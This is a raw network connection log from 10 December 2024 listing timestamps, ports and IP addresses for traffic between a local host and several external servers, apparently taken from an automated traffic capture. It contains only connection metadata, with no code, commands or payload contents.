Dec 10, 2024 11:11:12.300769091 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.300841093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.300882101 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.302054882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.302130938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.302186966 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.302959919 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.303006887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.303128958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.303172112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.304037094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.304081917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.304199934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.304265976 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.305103064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.305151939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.305218935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.305305958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.306288004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.306350946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.306385040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.306428909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.307379007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.307430983 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.307459116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.307502031 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.308440924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.308486938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.308559895 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.308649063 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.309587955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.309634924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.309695005 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.309731960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.310669899 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.310708046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.310714006 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.310750008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.311724901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.311769009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.311851978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.311893940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.312906027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.312953949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.312963963 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.313005924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.314063072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.314106941 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.314233065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.314279079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.315366983 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.315428972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.315498114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.315541029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.316649914 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.316698074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.316782951 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.316826105 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.317760944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.317802906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.317851067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.317894936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.318797112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.318840981 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.318871975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.318913937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.319854975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.319902897 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.319966078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.320008993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.320914984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.320967913 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.455336094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.455406904 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.455436945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.455483913 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.455770969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.455869913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.455914021 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.456947088 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.457000971 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.457035065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.457087040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.458112955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.458165884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.458197117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.458240986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.459186077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.459230900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.459328890 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.459383965 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.460237980 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.460283041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.460315943 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.460357904 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:14.677109957 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:14.677490950 CET	49849	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:14.796729088 CET	80	49827	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:14.796789885 CET	80	49849	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:14.796813965 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:14.796861887 CET	49849	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:14.797059059 CET	49849	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:14.916639090 CET	80	49849	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:16.133131027 CET	80	49849	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:16.133320093 CET	49849	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:16.137393951 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:16.256789923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:16.256918907 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:16.272377014 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:16.392007113 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.123506069 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:17.242866039 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:17.242986917 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:17.257486105 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:17.376771927 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:17.627454996 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.627485991 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.627522945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.627559900 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.627873898 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.627914906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.627924919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.627928019 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.627958059 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.628521919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.628587008 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.628596067 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.628598928 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.628624916 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.628634930 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.629136086 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.629266024 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.629288912 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.629302979 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.747006893 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.747090101 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.747162104 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.747359037 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.751121998 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.751180887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.752791882 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.752840042 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.752866030 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.752907991 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.820003033 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.820063114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.820092916 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.820223093 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.824094057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.825650930 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.825726986 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.825754881 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.825807095 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.834070921 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.834203959 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.834230900 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.834255934 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.842452049 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.842622042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.842689991 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.842690945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.850786924 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.850836039 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.850878954 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.850927114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.859251022 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.859292984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.859384060 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.859457016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.867666006 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.867717028 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.867825985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.867870092 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.875962973 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.876008034 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.876116037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.876153946 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.884372950 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.884424925 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.884473085 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.884516001 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.891984940 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.892030954 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.892086029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.892131090 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.987334013 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.987394094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.987426996 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.987586021 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:17.991327047 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:17.991372108 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.011980057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.012079000 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.012157917 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.012157917 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.014195919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.014246941 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.014319897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.014364004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.018524885 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.018582106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.018717051 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.018760920 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.021042109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.021081924 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.021147966 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.021192074 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.025369883 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.025424004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.025463104 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.025506020 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.029722929 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.029772043 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.029858112 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.029901981 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.034060955 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.034106970 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.034164906 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.034209013 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.038306952 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.038351059 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.038410902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.038455963 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.042541981 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.042588949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.042649031 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.042690992 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.046866894 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.046911001 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.046993017 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.047032118 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.051234961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.051310062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.051321983 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.051351070 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.055505037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.055573940 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.055593967 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.055672884 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.059771061 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.059820890 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.059825897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.059875965 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.064083099 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.064130068 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.064189911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.064228058 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.068387032 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.068434000 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.068546057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.068592072 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.072694063 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.072735071 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.072793961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.072835922 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.077040911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.077085018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.077147961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.077189922 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.081301928 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.081348896 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.081387043 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.081432104 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.085611105 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.085655928 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.085689068 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.085741997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.089915037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.089957952 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.090002060 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.090043068 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.106962919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.107013941 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.107130051 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.107300997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.183056116 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.183115959 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.183166027 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.183221102 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.185086012 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.185139894 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.185141087 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.185194016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.189152956 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.189213037 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.204190969 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.204241037 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.204323053 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.204359055 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.205725908 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.205769062 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.205841064 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.205885887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.209156036 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.209208012 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.209223032 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.209577084 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.212536097 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.212548018 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.212584972 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.215858936 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.215903997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.215989113 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.216157913 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.219161034 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.219213963 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.219293118 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.219333887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.222377062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.222424984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.222479105 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.222520113 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.225680113 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.225728989 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.225781918 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.225827932 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.228830099 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.228876114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.228961945 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.229005098 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.232155085 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.232201099 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.232368946 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.232410908 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.235260010 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.235301018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.235307932 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.235351086 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.237157106 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.237200975 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.237266064 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.237330914 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.239073992 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.239123106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.239253998 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.239291906 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.240973949 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.241014004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.241065979 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.241108894 CET	49850	80	192.168.2.5	185.215.113.16
